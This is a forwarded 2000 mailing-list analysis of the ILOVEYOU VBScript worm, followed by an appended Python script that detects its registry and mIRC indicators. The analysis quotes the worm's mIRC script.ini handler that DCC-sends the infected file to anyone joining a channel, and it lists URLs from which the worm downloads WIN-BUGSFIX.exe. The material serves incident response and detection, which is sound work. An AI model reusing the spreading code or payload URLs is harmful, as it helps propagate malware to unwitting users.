Put together by Morgan Sarges, one of our engineers. Regards,
--
Nathan Norman "Eschew Obfuscation"
Network Engineer
GPG Key ID 1024D/51F98BB7
http://home.midco.net/~nnorman/
Key fingerprint = C5F4 A147 416C E0BF AB73 8BEF F0C8 255C 51F9 8BB7
Virus Summary: Date May 3, 2000, 8:20am

This script works as listed below:

It has 5 subroutines: regruns, html, spreadtoemail, listadriv, regruns

First up, some registry keys are created:
    HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
    HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout 0
These are associated with Windows Scripting Host.

Then, the following file copies occur:
    MSKernel32.vbs, Win32DLL.vbs, LOVE-LETTER-FOR-YOU.TXT.vbs
These files are copied to wherever the Windows Scripting Host files live. (I haven't worked with Windows Scripting Host.)

Next, the following registry keys are created:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory

Next, the following is run:
    Randomize
    num = Int((4 * Rnd) + 1)
Which is a random number generator that cranks out a number between 1 and 4, inclusive.
An if-else block executes, based on the number generated, and points the user's machine (via Internet Explorer) to one of the following URLs. The URLs below also have registry keys created, and the keys are listed with their respective URLs:

    http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
        HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
    http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
        HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
    http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
        HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
    http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
        HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

If this file (WIN-BUGSFIX.exe) has already been pulled, the following registry key is created:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank
(The end result at this point is that IE will start up with blank.htm.)

Now, a list of drives is created, and all drives are scanned in the following manner:
    Any files with .vbs or .vbe extensions (Visual Basic scripts or exes) are written to a list (flat text file).
    Any files with .js .jse .css .wsh .sct .hta are written to another list.
    Any files with .jpg .jpeg .mp2 .mp3 extensions are written to another list.

Next, the infected system is searched for mirc32.exe, and if it is on the system, an IRC script is created, so that the next time mIRC is run, when the IRC server is contacted, the script will DCC send the 3rd file list (with JPEGs and MP3s) to a channel, which listens for these lists.
The contents of the mIRC script are below, in a file called script.ini inside the mIRC directory tree:

    Please dont edit this script... mIRC will corrupt, if mIRC will corrupt... WINDOWS will affect and will not run correctly. thanks
    ;
    ;Khaled Mardam-Bey
    ;http://www.mirc.com
    ;
    n0=on 1:JOIN:#:{
    n1=  /if ( $nick == $me ) { halt }
    n2=  /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM
    n3=}

Now, another directory search is run based on the 3 file lists built. Files and folders meeting the criteria above are tagged as infected.

Next, the email propagation begins. Any program that can make use of the following registry keys will be checked for address books:
    HKEY_CURRENT_USER\Software\Microsoft\WAB\
A temporary address list is created, with a counter. The new email message is formatted, the attachment is hooked up, and the email is dumped to a server. Once this occurs, the following registry keys are written:
    HKEY_CURRENT_USER\Software\Microsoft\WAB\
Under this key, there will be a DWORD with a value of 1, and an address entry count.

If a user gets to messing with the attachment, the attachment will ask the user to click on a button to enable ActiveX controls. If this is successful, the files copied initially, MSKernel32.vbs, may be run.

This is by no means a complete summary. I'll try to send more info as I dig into the EXEs that are pulled from the web URLs listed above.

Morgan
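The summary above lists three kinds of host-side indicators: autorun values under Run/RunServices that launch the dropped .vbs files, an Internet Explorer Start Page pointing at WIN-BUGSFIX.exe, and a mIRC script.ini whose JOIN handler DCC-sends a file. The following is an added example (not part of Morgan's analysis or the forwarded message) of a small triage check that looks for exactly those indicators. The registry entries and script.ini text are constructed inline so the script runs offline; on a real host the tuples would come from an export of those keys. The ".vbs/.vbe in an autorun value" heuristic goes slightly beyond the page by flagging any script-launching autorun entry, not only the named ones.

```python
import re

# Constructed sample of autorun / IE registry values as (key, value_name, data)
# tuples. Not read from a live registry; built inline to mirror the keys named
# in the summary, plus one benign entry to show the check is selective.
SAMPLE_REGISTRY = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "MSKernel32",
     r"C:\WINDOWS\SYSTEM\MSKernel32.vbs"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices", "Win32DLL",
     r"C:\WINDOWS\Win32DLL.vbs"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "WIN-BUGSFIX",
     r"C:\WINDOWS\Downloaded Files\WIN-BUGSFIX.exe"),
    (r"HKCU\Software\Microsoft\Internet Explorer\Main", "Start Page",
     "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Example",
     r"C:\Program Files\Example\example.exe"),  # benign, should not be flagged
]

# Constructed script.ini body, reproducing the handler quoted in the summary.
SAMPLE_SCRIPT_INI = """;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1=  /if ( $nick == $me ) { halt }
n2=  /.dcc send $nick "&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM
n3=}
"""

# Key suffixes and names taken from the summary above.
AUTORUN_KEYS = (
    r"\software\microsoft\windows\currentversion\run",
    r"\software\microsoft\windows\currentversion\runservices",
)
KNOWN_NAMES = {"MSKernel32", "Win32DLL", "WIN-BUGSFIX"}
KNOWN_FILES = {"mskernel32.vbs", "win32dll.vbs", "win-bugsfix.exe",
               "love-letter-for-you.txt.vbs", "love-letter-for-you.htm"}


def check_registry(entries):
    """Return a list of findings for autorun and IE Start Page indicators."""
    findings = []
    for key, name, data in entries:
        key_l, data_l = key.lower(), data.lower()
        basename = data_l.replace("/", "\\").rsplit("\\", 1)[-1]
        is_autorun = key_l.endswith(AUTORUN_KEYS)
        if is_autorun and (name in KNOWN_NAMES or basename in KNOWN_FILES):
            findings.append(f"autorun {key}\\{name} -> {data} (named in the summary)")
        elif is_autorun and basename.endswith((".vbs", ".vbe")):
            # Broader heuristic: any autorun entry that launches a script.
            findings.append(f"autorun {key}\\{name} launches a script: {data}")
        if name.lower() == "start page" and "internet explorer\\main" in key_l:
            if "win-bugsfix.exe" in data_l or "skyinet.net" in data_l:
                findings.append(f"IE Start Page hijacked to {data}")
    return findings


def check_mirc_script(text):
    """Flag an 'on ...:JOIN:' handler that issues a DCC send."""
    findings = []
    in_join = False
    for raw in text.splitlines():
        line = re.sub(r"^n\d+=", "", raw.strip())  # drop mIRC's nN= prefixes
        if re.search(r"\bon\s+\S*:JOIN:", line, re.IGNORECASE):
            in_join = True
        if in_join and re.search(r"dcc\s+send", line, re.IGNORECASE):
            findings.append(f"JOIN handler sends a file by DCC: {line}")
        if in_join and line.startswith("}"):
            in_join = False
    return findings


def run_checks(entries=SAMPLE_REGISTRY, script_ini=SAMPLE_SCRIPT_INI):
    """Combine both checks; returns a dict so callers can act on each class."""
    return {"registry": check_registry(entries),
            "mirc": check_mirc_script(script_ini)}


if __name__ == "__main__":
    for kind, items in run_checks().items():
        for item in items:
            print(f"[{kind}] {item}")
```

The point of keeping the indicators in small sets is that a responder can extend them as the analysis continues (the summary itself says it is incomplete) without touching the matching logic; the DCC check is deliberately independent of the filename, since a script that sends anything on channel join is the behaviour worth looking at, not the particular file.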